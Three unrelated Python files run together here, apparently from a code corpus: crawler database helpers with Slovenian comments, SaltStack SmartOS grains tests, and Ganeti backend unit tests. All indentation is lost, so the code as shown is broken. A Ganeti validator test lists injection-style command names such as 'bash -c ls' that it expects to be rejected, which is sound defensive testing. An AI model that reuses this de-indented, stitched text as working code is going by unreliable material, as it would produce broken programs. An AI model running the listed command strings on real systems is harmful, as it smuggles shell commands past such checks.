###
def DB_tag_feed(db, art_id, art_feedid, art_feedsiteid, art_siteid, name, value):
c = db.cursor()
c.execute("INSERT INTO feed_tags (feed_articleid, feed_articlefeedid, feed_articlefeedsiteid, feed_articlesiteid, name, value) VALUES (%s, %s, %s, %s, %s, %s)",
(art_id, art_feedid, art_feedsiteid, art_siteid, name, value))
db.commit()
# !bn: the site should be passed in as a variable, since we are sure to have it already...
def DB_log(db, siteid, URL, code, size):
c = db.cursor()
c.execute("INSERT INTO access_log (siteid, URL, HTTP_code, size) VALUES (%s,%s,%s,%s)", (siteid, URL, code, size))
db.commit()
###
def DB_unlock_sites(db):
DB_exec(db, "UPDATE site SET locked=false WHERE locked")
# !bn: pogoj "enqueued AND " dodan zato ker drugac nardi seq. scan cez celo tabelo
# itak hocmo unlockat samo taksne ki dejansko so enqueueani...
def DB_unlock_feedarticles(db):
return
DB_exec(db, "UPDATE feed_article SET locked=false WHERE enqueued AND locked")
SQL_FIND_REQUESTS = """
SELECT MAX(feed_article.id) AS min_fa_id, site.id as siteid
INTO TEMPORARY temp_requests
FROM feed_article
INNER JOIN site ON feed_article.siteid = site.id
WHERE
feed_article.rndpos BETWEEN %s AND %s
AND NOT site.disabled
AND NOT site.locked
AND site.next_request < NOW()
AND feed_article.enqueued
AND NOT feed_article.locked
AND feed_article.next_attempt < NOW()
GROUP BY site.id
ORDER BY RANDOM()
LIMIT %s
"""
# ref_url, rq_url, art_id, art_feedid, art_feedsiteid, art_siteid
SQL_RETR_REQUESTS="""
SELECT f.URL, a.URL, a.id, a.feedid, a.feedsiteid, a.siteid
FROM feed_article AS a
INNER JOIN temp_requests AS t ON a.id = t.min_fa_id
INNER JOIN feed AS f ON a.feedid = f.id
"""
SQL_LOCK_REQUESTS="UPDATE feed_article SET locked=true WHERE id IN (SELECT min_fa_id FROM temp_requests)"
SQL_LOCK_SITES="UPDATE site SET locked=true WHERE id IN (SELECT siteid FROM temp_requests)"
SQL_DROP_TEMPORARY="DROP TABLE temp_requests"
def DB_find_requests(db, N_req, rndp_eps = 0.001):
c = db.cursor()
rndp = random.random()
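# pick requests from a narrow random window of feed_article.rndpos values (presumably to avoid full-table scans and to let concurrent workers sample different articles)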
c.execute(SQL_FIND_REQUESTS, (rndp - rndp_eps, rndp + rndp_eps, N_req))
c.execute(SQL_RETR_REQUESTS)
r = c.fetchall()
c.execute(SQL_LOCK_REQUESTS)
c.execute(SQL_LOCK_SITES)
c.execute(SQL_DROP_TEMPORARY)
db.commit()
return r
|
|
"""
:codeauthor: :email:`Jorge Schrauwen <[email protected]>`
"""
import textwrap
import salt.grains.smartos as smartos
from tests.support.mock import MagicMock, Mock, mock_open, patch
from tests.support.unit import TestCase
class SmartOSGrainsTestCase(TestCase):
"""
Test cases for smartos grains
"""
def test_smartos_computenode_data(self):
"""
Get a tally of running/stopped zones
Output used from a test host with one running
and one stopped of each vm type.
"""
grains_exp_res = {
"computenode_sdc_version": "7.0",
"computenode_vm_capable": True,
"computenode_vm_hw_virt": "vmx",
"computenode_vms_running": 3,
"computenode_vms_stopped": 3,
"computenode_vms_total": 6,
"computenode_vms_type": {"KVM": 2, "LX": 2, "OS": 2},
"manufacturer": "Supermicro",
"productname": "X8STi",
"uuid": "534d4349-0002-2790-2500-2790250054c5",
}
cmd_mock = Mock(
side_effect=[
textwrap.dedent(
"""\
99e40ee7-a8f9-4b57-9225-e7bd19f64b07:test_hvm1:running:BHYV
cde351a9-e23d-6856-e268-fff10fe603dc:test_hvm2:stopped:BHYV
99e40ee7-a8f9-4b57-9225-e7bd19f64b07:test_hvm3:running:KVM
cde351a9-e23d-6856-e268-fff10fe603dc:test_hvm4:stopped:KVM
179b50ca-8a4d-4f28-bb08-54b2cd350aa5:test_zone1:running:OS
42846fbc-c48a-6390-fd85-d7ac6a76464c:test_zone2:stopped:OS
4fd2d7a4-38c4-4068-a2c8-74124364a109:test_zone3:running:LX
717abe34-e7b9-4387-820e-0bb041173563:test_zone4:stopped:LX"""
),
textwrap.dedent(
"""\
{
"Live Image": "20181011T004530Z",
"System Type": "SunOS",
"Boot Time": "1562528522",
"SDC Version": "7.0",
"Manufacturer": "Supermicro",
"Product": "X8STi",
"Serial Number": "1234567890",
"SKU Number": "To Be Filled By O.E.M.",
"HW Version": "1234567890",
"HW Family": "High-End Desktop",
"Setup": "false",
"VM Capable": true,
"Bhyve Capable": false,
"Bhyve Max Vcpus": 0,
"HVM API": false,
"CPU Type": "Intel(R) Xeon(R) CPU W3520 @ 2.67GHz",
"CPU Virtualization": "vmx",
"CPU Physical Cores": 1,
"Admin NIC Tag": "",
"UUID": "534d4349-0002-2790-2500-2790250054c5",
"Hostname": "sdc",
"CPU Total Cores": 8,
"MiB of Memory": "16375",
"Zpool": "zones",
"Zpool Disks": "c1t0d0,c1t1d0",
"Zpool Profile": "mirror",
"Zpool Creation": 1406392163,
"Zpool Size in GiB": 1797,
"Disks": {
"c1t0d0": {"Size in GB": 2000},
"c1t1d0": {"Size in GB": 2000}
},
"Boot Parameters": {
"smartos": "true",
"console": "text",
"boot_args": "",
"bootargs": ""
},
"Network Interfaces": {
"e1000g0": {"MAC Address": "00:00:00:00:00:01", "ip4addr": "123.123.123.123", "Link Status": "up", "NIC Names": ["admin"]},
"e1000g1": {"MAC Address": "00:00:00:00:00:05", "ip4addr": "", "Link Status": "down", "NIC Names": []}
},
"Virtual Network Interfaces": {
},
"Link Aggregations": {
}
}"""
),
]
)
with patch.dict(smartos.__salt__, {"cmd.run": cmd_mock}):
grains_res = smartos._smartos_computenode_data()
self.assertEqual(grains_exp_res, grains_res)
def test_smartos_zone_data(self):
"""
Get basic information about a non-global zone
"""
grains_exp_res = {
"imageversion": "pkgbuild 18.1.0",
"zoneid": "5",
"zonename": "dda70f61-70fe-65e7-cf70-d878d69442d4",
}
cmd_mock = Mock(
side_effect=[
"5:dda70f61-70fe-65e7-cf70-d878d69442d4:running:/:dda70f61-70fe-65e7-cf70-d878d69442d4:native:excl:0",
]
)
fopen_mock = mock_open(
read_data={
"/etc/product": textwrap.dedent(
"""\
Name: Joyent Instance
Image: pkgbuild 18.1.0
Documentation: https://docs.joyent.com/images/smartos/pkgbuild
"""
),
}
)
with patch.dict(smartos.__salt__, {"cmd.run": cmd_mock}), patch(
"os.path.isfile", MagicMock(return_value=True)
), patch("salt.utils.files.fopen", fopen_mock):
grains_res = smartos._smartos_zone_data()
self.assertEqual(grains_exp_res, grains_res)
def test_smartos_zone_pkgsrc_data_in_zone(self):
"""
Get pkgsrc information from a zone
"""
grains_exp_res = {
"pkgsrcpath": (
"https://pkgsrc.joyent.com/packages/SmartOS/2018Q1/x86_64/All"
),
"pkgsrcversion": "2018Q1",
}
isfile_mock = Mock(side_effect=[True, False])
fopen_mock = mock_open(
read_data={
"/opt/local/etc/pkg_install.conf": textwrap.dedent(
"""\
GPG_KEYRING_VERIFY=/opt/local/etc/gnupg/pkgsrc.gpg
GPG_KEYRING_PKGVULN=/opt/local/share/gnupg/pkgsrc-security.gpg
PKG_PATH=https://pkgsrc.joyent.com/packages/SmartOS/2018Q1/x86_64/All
"""
),
}
)
with patch("os.path.isfile", isfile_mock), patch(
"salt.utils.files.fopen", fopen_mock
):
grains_res = smartos._smartos_zone_pkgsrc_data()
self.assertEqual(grains_exp_res, grains_res)
def test_smartos_zone_pkgsrc_data_in_globalzone(self):
"""
Get pkgsrc information from the globalzone
"""
grains_exp_res = {
"pkgsrcpath": "https://pkgsrc.joyent.com/packages/SmartOS/trunk/tools/All",
"pkgsrcversion": "trunk",
}
isfile_mock = Mock(side_effect=[False, True])
fopen_mock = mock_open(
read_data={
"/opt/tools/etc/pkg_install.conf": textwrap.dedent(
"""\
GPG_KEYRING_PKGVULN=/opt/tools/share/gnupg/pkgsrc-security.gpg
GPG_KEYRING_VERIFY=/opt/tools/etc/gnupg/pkgsrc.gpg
PKG_PATH=https://pkgsrc.joyent.com/packages/SmartOS/trunk/tools/All
VERIFIED_INSTALLATION=always
"""
),
}
)
with patch("os.path.isfile", isfile_mock), patch(
"salt.utils.files.fopen", fopen_mock
):
grains_res = smartos._smartos_zone_pkgsrc_data()
self.assertEqual(grains_exp_res, grains_res)
def test_smartos_zone_pkgin_data_in_zone(self):
"""
Get pkgin information from a zone
"""
grains_exp_res = {
"pkgin_repositories": [
"https://pkgsrc.joyent.com/packages/SmartOS/2018Q1/x86_64/All",
"http://pkg.blackdot.be/packages/2018Q1/x86_64/All",
],
}
isfile_mock = Mock(side_effect=[True, False])
fopen_mock = mock_open(
read_data={
"/opt/local/etc/pkgin/repositories.conf": textwrap.dedent(
"""\
# $Id: repositories.conf,v 1.3 2012/06/13 13:50:17 imilh Exp $
#
# Pkgin repositories list
#
# Simply add repositories URIs one below the other
#
# WARNING: order matters, duplicates will not be added, if two
# repositories hold the same package, it will be fetched from
# the first one listed in this file.
#
# This file format supports the following macros:
# $arch to define the machine hardware platform
# $osrelease to define the release version for the operating system
#
# Remote ftp repository
#
# ftp://ftp.netbsd.org/pub/pkgsrc/packages/NetBSD/$arch/5.1/All
#
# Remote http repository
#
# http://mirror-master.dragonflybsd.org/packages/$arch/DragonFly-$osrelease/stable/All
#
# Local repository (must contain a pkg_summary.gz or bz2)
#
# file:///usr/pkgsrc/packages/All
#
https://pkgsrc.joyent.com/packages/SmartOS/2018Q1/x86_64/All
http://pkg.blackdot.be/packages/2018Q1/x86_64/All
"""
),
}
)
with patch("os.path.isfile", isfile_mock), patch(
"salt.utils.files.fopen", fopen_mock
):
grains_res = smartos._smartos_zone_pkgin_data()
self.assertEqual(grains_exp_res, grains_res)
def test_smartos_zone_pkgin_data_in_globalzone(self):
"""
Get pkgin information from the globalzone
"""
grains_exp_res = {
"pkgin_repositories": [
"https://pkgsrc.joyent.com/packages/SmartOS/trunk/tools/All",
],
}
isfile_mock = Mock(side_effect=[False, True])
fopen_mock = mock_open(
read_data={
"/opt/tools/etc/pkgin/repositories.conf": textwrap.dedent(
"""\
#
# Pkgin repositories list
#
# Simply add repositories URIs one below the other
#
# WARNING: order matters, duplicates will not be added, if two
# repositories hold the same package, it will be fetched from
# the first one listed in this file.
#
# This file format supports the following macros:
# $arch to define the machine hardware platform
# $osrelease to define the release version for the operating system
#
# Remote ftp repository
#
# ftp://ftp.netbsd.org/pub/pkgsrc/packages/NetBSD/$arch/5.1/All
#
# Remote http repository
#
# http://mirror-master.dragonflybsd.org/packages/$arch/DragonFly-$osrelease/stable/All
#
# Local repository (must contain a pkg_summary.gz or bz2)
#
# file:///usr/pkgsrc/packages/All
#
https://pkgsrc.joyent.com/packages/SmartOS/trunk/tools/All
"""
),
}
)
with patch("os.path.isfile", isfile_mock), patch(
"salt.utils.files.fopen", fopen_mock
):
grains_res = smartos._smartos_zone_pkgin_data()
self.assertEqual(grains_exp_res, grains_res)
|
|
#!/usr/bin/python
#
# Copyright (C) 2010, 2013 Google Inc.
# All rights reserved.
#
# Redistribution and use in source and binary forms, with or without
# modification, are permitted provided that the following conditions are
# met:
#
# 1. Redistributions of source code must retain the above copyright notice,
# this list of conditions and the following disclaimer.
#
# 2. Redistributions in binary form must reproduce the above copyright
# notice, this list of conditions and the following disclaimer in the
# documentation and/or other materials provided with the distribution.
#
# THIS SOFTWARE IS PROVIDED BY THE COPYRIGHT HOLDERS AND CONTRIBUTORS "AS
# IS" AND ANY EXPRESS OR IMPLIED WARRANTIES, INCLUDING, BUT NOT LIMITED
# TO, THE IMPLIED WARRANTIES OF MERCHANTABILITY AND FITNESS FOR A PARTICULAR
# PURPOSE ARE DISCLAIMED. IN NO EVENT SHALL THE COPYRIGHT HOLDER OR
# CONTRIBUTORS BE LIABLE FOR ANY DIRECT, INDIRECT, INCIDENTAL, SPECIAL,
# EXEMPLARY, OR CONSEQUENTIAL DAMAGES (INCLUDING, BUT NOT LIMITED TO,
# PROCUREMENT OF SUBSTITUTE GOODS OR SERVICES; LOSS OF USE, DATA, OR
# PROFITS; OR BUSINESS INTERRUPTION) HOWEVER CAUSED AND ON ANY THEORY OF
# LIABILITY, WHETHER IN CONTRACT, STRICT LIABILITY, OR TORT (INCLUDING
# NEGLIGENCE OR OTHERWISE) ARISING IN ANY WAY OUT OF THE USE OF THIS
# SOFTWARE, EVEN IF ADVISED OF THE POSSIBILITY OF SUCH DAMAGE.
"""Script for testing ganeti.backend"""
import mock
import os
import shutil
import tempfile
import testutils
import unittest
from ganeti import backend
from ganeti import constants
from ganeti import errors
from ganeti import hypervisor
from ganeti import netutils
from ganeti import utils
class TestX509Certificates(unittest.TestCase):
def setUp(self):
self.tmpdir = tempfile.mkdtemp()
def tearDown(self):
shutil.rmtree(self.tmpdir)
def test(self):
(name, cert_pem) = backend.CreateX509Certificate(300, cryptodir=self.tmpdir)
self.assertEqual(utils.ReadFile(os.path.join(self.tmpdir, name,
backend._X509_CERT_FILE)),
cert_pem)
self.assert_(0 < os.path.getsize(os.path.join(self.tmpdir, name,
backend._X509_KEY_FILE)))
(name2, cert_pem2) = \
backend.CreateX509Certificate(300, cryptodir=self.tmpdir)
backend.RemoveX509Certificate(name, cryptodir=self.tmpdir)
backend.RemoveX509Certificate(name2, cryptodir=self.tmpdir)
self.assertEqual(utils.ListVisibleFiles(self.tmpdir), [])
def testNonEmpty(self):
(name, _) = backend.CreateX509Certificate(300, cryptodir=self.tmpdir)
utils.WriteFile(utils.PathJoin(self.tmpdir, name, "hello-world"),
data="Hello World")
self.assertRaises(backend.RPCFail, backend.RemoveX509Certificate,
name, cryptodir=self.tmpdir)
self.assertEqual(utils.ListVisibleFiles(self.tmpdir), [name])
class TestNodeVerify(testutils.GanetiTestCase):
def setUp(self):
testutils.GanetiTestCase.setUp(self)
self._mock_hv = None
def _GetHypervisor(self, hv_name):
self._mock_hv = hypervisor.GetHypervisor(hv_name)
self._mock_hv.ValidateParameters = mock.Mock()
self._mock_hv.Verify = mock.Mock()
return self._mock_hv
def testMasterIPLocalhost(self):
# this is a real functional test, but it requires localhost to be reachable
local_data = (netutils.Hostname.GetSysName(),
constants.IP4_ADDRESS_LOCALHOST)
result = backend.VerifyNode({constants.NV_MASTERIP: local_data}, None, {})
self.failUnless(constants.NV_MASTERIP in result,
"Master IP data not returned")
self.failUnless(result[constants.NV_MASTERIP], "Cannot reach localhost")
def testMasterIPUnreachable(self):
# Network 192.0.2.0/24 is reserved for test/documentation as per
# RFC 5737
bad_data = ("master.example.com", "192.0.2.1")
# we just test that whatever TcpPing returns, VerifyNode returns too
netutils.TcpPing = lambda a, b, source=None: False
result = backend.VerifyNode({constants.NV_MASTERIP: bad_data}, None, {})
self.failUnless(constants.NV_MASTERIP in result,
"Master IP data not returned")
self.failIf(result[constants.NV_MASTERIP],
"Result from netutils.TcpPing corrupted")
def testVerifyHvparams(self):
test_hvparams = {constants.HV_XEN_CMD: constants.XEN_CMD_XL}
test_what = {constants.NV_HVPARAMS: \
[("mynode", constants.HT_XEN_PVM, test_hvparams)]}
result = {}
backend._VerifyHvparams(test_what, True, result,
get_hv_fn=self._GetHypervisor)
self._mock_hv.ValidateParameters.assert_called_with(test_hvparams)
def testVerifyHypervisors(self):
hvname = constants.HT_XEN_PVM
hvparams = {constants.HV_XEN_CMD: constants.XEN_CMD_XL}
all_hvparams = {hvname: hvparams}
test_what = {constants.NV_HYPERVISOR: [hvname]}
result = {}
backend._VerifyHypervisors(
test_what, True, result, all_hvparams=all_hvparams,
get_hv_fn=self._GetHypervisor)
self._mock_hv.Verify.assert_called_with(hvparams=hvparams)
def _DefRestrictedCmdOwner():
return (os.getuid(), os.getgid())
class TestVerifyRestrictedCmdName(unittest.TestCase):
def testAcceptableName(self):
for i in ["foo", "bar", "z1", "000first", "hello-world"]:
for fn in [lambda s: s, lambda s: s.upper(), lambda s: s.title()]:
(status, msg) = backend._VerifyRestrictedCmdName(fn(i))
self.assertTrue(status)
self.assertTrue(msg is None)
def testEmptyAndSpace(self):
for i in ["", " ", "\t", "\n"]:
(status, msg) = backend._VerifyRestrictedCmdName(i)
self.assertFalse(status)
self.assertEqual(msg, "Missing command name")
def testNameWithSlashes(self):
for i in ["/", "./foo", "../moo", "some/name"]:
(status, msg) = backend._VerifyRestrictedCmdName(i)
self.assertFalse(status)
self.assertEqual(msg, "Invalid command name")
def testForbiddenCharacters(self):
for i in ["#", ".", "..", "bash -c ls", "'"]:
(status, msg) = backend._VerifyRestrictedCmdName(i)
self.assertFalse(status)
self.assertEqual(msg, "Command name contains forbidden characters")
class TestVerifyRestrictedCmdDirectory(unittest.TestCase):
def setUp(self):
self.tmpdir = tempfile.mkdtemp()
def tearDown(self):
shutil.rmtree(self.tmpdir)
def testCanNotStat(self):
tmpname = utils.PathJoin(self.tmpdir, "foobar")
self.assertFalse(os.path.exists(tmpname))
(status, msg) = \
backend._VerifyRestrictedCmdDirectory(tmpname, _owner=NotImplemented)
self.assertFalse(status)
self.assertTrue(msg.startswith("Can't stat(2) '"))
def testTooPermissive(self):
tmpname = utils.PathJoin(self.tmpdir, "foobar")
os.mkdir(tmpname)
for mode in [0777, 0706, 0760, 0722]:
os.chmod(tmpname, mode)
self.assertTrue(os.path.isdir(tmpname))
(status, msg) = \
backend._VerifyRestrictedCmdDirectory(tmpname, _owner=NotImplemented)
self.assertFalse(status)
self.assertTrue(msg.startswith("Permissions on '"))
def testNoDirectory(self):
tmpname = utils.PathJoin(self.tmpdir, "foobar")
utils.WriteFile(tmpname, data="empty\n")
self.assertTrue(os.path.isfile(tmpname))
(status, msg) = \
backend._VerifyRestrictedCmdDirectory(tmpname,
_owner=_DefRestrictedCmdOwner())
self.assertFalse(status)
self.assertTrue(msg.endswith("is not a directory"))
def testNormal(self):
tmpname = utils.PathJoin(self.tmpdir, "foobar")
os.mkdir(tmpname)
os.chmod(tmpname, 0755)
self.assertTrue(os.path.isdir(tmpname))
(status, msg) = \
backend._VerifyRestrictedCmdDirectory(tmpname,
_owner=_DefRestrictedCmdOwner())
self.assertTrue(status)
self.assertTrue(msg is None)
class TestVerifyRestrictedCmd(unittest.TestCase):
def setUp(self):
self.tmpdir = tempfile.mkdtemp()
def tearDown(self):
shutil.rmtree(self.tmpdir)
def testCanNotStat(self):
tmpname = utils.PathJoin(self.tmpdir, "helloworld")
self.assertFalse(os.path.exists(tmpname))
(status, msg) = \
backend._VerifyRestrictedCmd(self.tmpdir, "helloworld",
_owner=NotImplemented)
self.assertFalse(status)
self.assertTrue(msg.startswith("Can't stat(2) '"))
def testNotExecutable(self):
tmpname = utils.PathJoin(self.tmpdir, "cmdname")
utils.WriteFile(tmpname, data="empty\n")
(status, msg) = \
backend._VerifyRestrictedCmd(self.tmpdir, "cmdname",
_owner=_DefRestrictedCmdOwner())
self.assertFalse(status)
self.assertTrue(msg.startswith("access(2) thinks '"))
def testExecutable(self):
tmpname = utils.PathJoin(self.tmpdir, "cmdname")
utils.WriteFile(tmpname, data="empty\n", mode=0700)
(status, executable) = \
backend._VerifyRestrictedCmd(self.tmpdir, "cmdname",
_owner=_DefRestrictedCmdOwner())
self.assertTrue(status)
self.assertEqual(executable, tmpname)
class TestPrepareRestrictedCmd(unittest.TestCase):
_TEST_PATH = "/tmp/some/test/path"
def testDirFails(self):
def fn(path):
self.assertEqual(path, self._TEST_PATH)
return (False, "test error 31420")
(status, msg) = \
backend._PrepareRestrictedCmd(self._TEST_PATH, "cmd21152",
_verify_dir=fn,
_verify_name=NotImplemented,
_verify_cmd=NotImplemented)
self.assertFalse(status)
self.assertEqual(msg, "test error 31420")
def testNameFails(self):
def fn(cmd):
self.assertEqual(cmd, "cmd4617")
return (False, "test error 591")
(status, msg) = \
backend._PrepareRestrictedCmd(self._TEST_PATH, "cmd4617",
_verify_dir=lambda _: (True, None),
_verify_name=fn,
_verify_cmd=NotImplemented)
self.assertFalse(status)
self.assertEqual(msg, "test error 591")
def testCommandFails(self):
def fn(path, cmd):
self.assertEqual(path, self._TEST_PATH)
self.assertEqual(cmd, "cmd17577")
return (False, "test error 25524")
(status, msg) = \
backend._PrepareRestrictedCmd(self._TEST_PATH, "cmd17577",
_verify_dir=lambda _: (True, None),
_verify_name=lambda _: (True, None),
_verify_cmd=fn)
self.assertFalse(status)
self.assertEqual(msg, "test error 25524")
def testSuccess(self):
def fn(path, cmd):
return (True, utils.PathJoin(path, cmd))
(status, executable) = \
backend._PrepareRestrictedCmd(self._TEST_PATH, "cmd22633",
_verify_dir=lambda _: (True, None),
_verify_name=lambda _: (True, None),
_verify_cmd=fn)
self.assertTrue(status)
self.assertEqual(executable, utils.PathJoin(self._TEST_PATH, "cmd22633"))
def _SleepForRestrictedCmd(duration):
assert duration > 5
def _GenericRestrictedCmdError(cmd):
return "Executing command '%s' failed" % cmd
class TestRunRestrictedCmd(unittest.TestCase):
def setUp(self):
self.tmpdir = tempfile.mkdtemp()
def tearDown(self):
shutil.rmtree(self.tmpdir)
def testNonExistantLockDirectory(self):
lockfile = utils.PathJoin(self.tmpdir, "does", "not", "exist")
sleep_fn = testutils.CallCounter(_SleepForRestrictedCmd)
self.assertFalse(os.path.exists(lockfile))
self.assertRaises(backend.RPCFail,
backend.RunRestrictedCmd, "test",
_lock_timeout=NotImplemented,
_lock_file=lockfile,
_path=NotImplemented,
_sleep_fn=sleep_fn,
_prepare_fn=NotImplemented,
_runcmd_fn=NotImplemented,
_enabled=True)
self.assertEqual(sleep_fn.Count(), 1)
@staticmethod
def _TryLock(lockfile):
sleep_fn = testutils.CallCounter(_SleepForRestrictedCmd)
result = False
try:
backend.RunRestrictedCmd("test22717",
_lock_timeout=0.1,
_lock_file=lockfile,
_path=NotImplemented,
_sleep_fn=sleep_fn,
_prepare_fn=NotImplemented,
_runcmd_fn=NotImplemented,
_enabled=True)
except backend.RPCFail, err:
assert str(err) == _GenericRestrictedCmdError("test22717"), \
"Did not fail with generic error message"
result = True
assert sleep_fn.Count() == 1
return result
def testLockHeldByOtherProcess(self):
lockfile = utils.PathJoin(self.tmpdir, "lock")
lock = utils.FileLock.Open(lockfile)
lock.Exclusive(blocking=True, timeout=1.0)
try:
self.assertTrue(utils.RunInSeparateProcess(self._TryLock, lockfile))
finally:
lock.Close()
@staticmethod
def _PrepareRaisingException(path, cmd):
assert cmd == "test23122"
raise Exception("test")
def testPrepareRaisesException(self):
lockfile = utils.PathJoin(self.tmpdir, "lock")
sleep_fn = testutils.CallCounter(_SleepForRestrictedCmd)
prepare_fn = testutils.CallCounter(self._PrepareRaisingException)
try:
backend.RunRestrictedCmd("test23122",
_lock_timeout=1.0, _lock_file=lockfile,
_path=NotImplemented, _runcmd_fn=NotImplemented,
_sleep_fn=sleep_fn, _prepare_fn=prepare_fn,
_enabled=True)
except backend.RPCFail, err:
self.assertEqual(str(err), _GenericRestrictedCmdError("test23122"))
else:
self.fail("Didn't fail")
self.assertEqual(sleep_fn.Count(), 1)
self.assertEqual(prepare_fn.Count(), 1)
@staticmethod
def _PrepareFails(path, cmd):
assert cmd == "test29327"
return ("some error message", None)
def testPrepareFails(self):
lockfile = utils.PathJoin(self.tmpdir, "lock")
sleep_fn = testutils.CallCounter(_SleepForRestrictedCmd)
prepare_fn = testutils.CallCounter(self._PrepareFails)
try:
backend.RunRestrictedCmd("test29327",
_lock_timeout=1.0, _lock_file=lockfile,
_path=NotImplemented, _runcmd_fn=NotImplemented,
_sleep_fn=sleep_fn, _prepare_fn=prepare_fn,
_enabled=True)
except backend.RPCFail, err:
self.assertEqual(str(err), _GenericRestrictedCmdError("test29327"))
else:
self.fail("Didn't fail")
self.assertEqual(sleep_fn.Count(), 1)
self.assertEqual(prepare_fn.Count(), 1)
@staticmethod
def _SuccessfulPrepare(path, cmd):
return (True, utils.PathJoin(path, cmd))
def testRunCmdFails(self):
lockfile = utils.PathJoin(self.tmpdir, "lock")
def fn(args, env=NotImplemented, reset_env=NotImplemented,
postfork_fn=NotImplemented):
self.assertEqual(args, [utils.PathJoin(self.tmpdir, "test3079")])
self.assertEqual(env, {})
self.assertTrue(reset_env)
self.assertTrue(callable(postfork_fn))
trylock = utils.FileLock.Open(lockfile)
try:
# See if lockfile is still held
self.assertRaises(EnvironmentError, trylock.Exclusive, blocking=False)
# Call back to release lock
postfork_fn(NotImplemented)
# See if lockfile can be acquired
trylock.Exclusive(blocking=False)
finally:
trylock.Close()
# Simulate a failed command
return utils.RunResult(constants.EXIT_FAILURE, None,
"stdout", "stderr406328567",
utils.ShellQuoteArgs(args),
NotImplemented, NotImplemented)
sleep_fn = testutils.CallCounter(_SleepForRestrictedCmd)
prepare_fn = testutils.CallCounter(self._SuccessfulPrepare)
runcmd_fn = testutils.CallCounter(fn)
try:
backend.RunRestrictedCmd("test3079",
_lock_timeout=1.0, _lock_file=lockfile,
_path=self.tmpdir, _runcmd_fn=runcmd_fn,
_sleep_fn=sleep_fn, _prepare_fn=prepare_fn,
_enabled=True)
except backend.RPCFail, err:
self.assertTrue(str(err).startswith("Restricted command 'test3079'"
" failed:"))
self.assertTrue("stderr406328567" in str(err),
msg="Error did not include output")
else:
self.fail("Didn't fail")
self.assertEqual(sleep_fn.Count(), 0)
self.assertEqual(prepare_fn.Count(), 1)
self.assertEqual(runcmd_fn.Count(), 1)
def testRunCmdSucceeds(self):
lockfile = utils.PathJoin(self.tmpdir, "lock")
def fn(args, env=NotImplemented, reset_env=NotImplemented,
postfork_fn=NotImplemented):
self.assertEqual(args, [utils.PathJoin(self.tmpdir, "test5667")])
self.assertEqual(env, {})
self.assertTrue(reset_env)
# Call back to release lock
postfork_fn(NotImplemented)
# Simulate a successful command
return utils.RunResult(constants.EXIT_SUCCESS, None, "stdout14463", "",
utils.ShellQuoteArgs(args),
NotImplemented, NotImplemented)
sleep_fn = testutils.CallCounter(_SleepForRestrictedCmd)
prepare_fn = testutils.CallCounter(self._SuccessfulPrepare)
runcmd_fn = testutils.CallCounter(fn)
result = backend.RunRestrictedCmd("test5667",
_lock_timeout=1.0, _lock_file=lockfile,
_path=self.tmpdir, _runcmd_fn=runcmd_fn,
_sleep_fn=sleep_fn,
_prepare_fn=prepare_fn,
_enabled=True)
self.assertEqual(result, "stdout14463")
self.assertEqual(sleep_fn.Count(), 0)
self.assertEqual(prepare_fn.Count(), 1)
self.assertEqual(runcmd_fn.Count(), 1)
def testCommandsDisabled(self):
try:
backend.RunRestrictedCmd("test",
_lock_timeout=NotImplemented,
_lock_file=NotImplemented,
_path=NotImplemented,
_sleep_fn=NotImplemented,
_prepare_fn=NotImplemented,
_runcmd_fn=NotImplemented,
_enabled=False)
except backend.RPCFail, err:
self.assertEqual(str(err),
"Restricted commands disabled at configure time")
else:
self.fail("Did not raise exception")
class TestSetWatcherPause(unittest.TestCase):
def setUp(self):
self.tmpdir = tempfile.mkdtemp()
self.filename = utils.PathJoin(self.tmpdir, "pause")
def tearDown(self):
shutil.rmtree(self.tmpdir)
def testUnsetNonExisting(self):
self.assertFalse(os.path.exists(self.filename))
backend.SetWatcherPause(None, _filename=self.filename)
self.assertFalse(os.path.exists(self.filename))
def testSetNonNumeric(self):
for i in ["", [], {}, "Hello World", "0", "1.0"]:
self.assertFalse(os.path.exists(self.filename))
try:
backend.SetWatcherPause(i, _filename=self.filename)
except backend.RPCFail, err:
self.assertEqual(str(err), "Duration must be numeric")
else:
self.fail("Did not raise exception")
self.assertFalse(os.path.exists(self.filename))
def testSet(self):
self.assertFalse(os.path.exists(self.filename))
for i in range(10):
backend.SetWatcherPause(i, _filename=self.filename)
self.assertEqual(utils.ReadFile(self.filename), "%s\n" % i)
self.assertEqual(os.stat(self.filename).st_mode & 0777, 0644)
class TestGetBlockDevSymlinkPath(unittest.TestCase):
def setUp(self):
self.tmpdir = tempfile.mkdtemp()
def tearDown(self):
shutil.rmtree(self.tmpdir)
def _Test(self, name, idx):
self.assertEqual(backend._GetBlockDevSymlinkPath(name, idx,
_dir=self.tmpdir),
("%s/%s%s%s" % (self.tmpdir, name,
constants.DISK_SEPARATOR, idx)))
def test(self):
for idx in range(100):
self._Test("inst1.example.com", idx)
class TestGetInstanceList(unittest.TestCase):
def setUp(self):
self._test_hv = self._TestHypervisor()
self._test_hv.ListInstances = mock.Mock(
return_value=["instance1", "instance2", "instance3"] )
class _TestHypervisor(hypervisor.hv_base.BaseHypervisor):
def __init__(self):
hypervisor.hv_base.BaseHypervisor.__init__(self)
def _GetHypervisor(self, name):
return self._test_hv
def testHvparams(self):
fake_hvparams = {constants.HV_XEN_CMD: constants.XEN_CMD_XL}
hvparams = {constants.HT_FAKE: fake_hvparams}
backend.GetInstanceList([constants.HT_FAKE], all_hvparams=hvparams,
get_hv_fn=self._GetHypervisor)
self._test_hv.ListInstances.assert_called_with(hvparams=fake_hvparams)
class TestGetHvInfo(unittest.TestCase):
def setUp(self):
self._test_hv = self._TestHypervisor()
self._test_hv.GetNodeInfo = mock.Mock()
class _TestHypervisor(hypervisor.hv_base.BaseHypervisor):
def __init__(self):
hypervisor.hv_base.BaseHypervisor.__init__(self)
def _GetHypervisor(self, name):
return self._test_hv
def testGetHvInfoAllNone(self):
result = backend._GetHvInfoAll(None)
self.assertTrue(result is None)
def testGetHvInfoAll(self):
hvname = constants.HT_XEN_PVM
hvparams = {constants.HV_XEN_CMD: constants.XEN_CMD_XL}
hv_specs = [(hvname, hvparams)]
backend._GetHvInfoAll(hv_specs, self._GetHypervisor)
self._test_hv.GetNodeInfo.assert_called_with(hvparams=hvparams)
class TestApplyStorageInfoFunction(unittest.TestCase):
_STORAGE_KEY = "some_key"
_SOME_ARGS = ["some_args"]
def setUp(self):
self.mock_storage_fn = mock.Mock()
def testApplyValidStorageType(self):
storage_type = constants.ST_LVM_VG
info_fn_orig = backend._STORAGE_TYPE_INFO_FN
backend._STORAGE_TYPE_INFO_FN = {
storage_type: self.mock_storage_fn
}
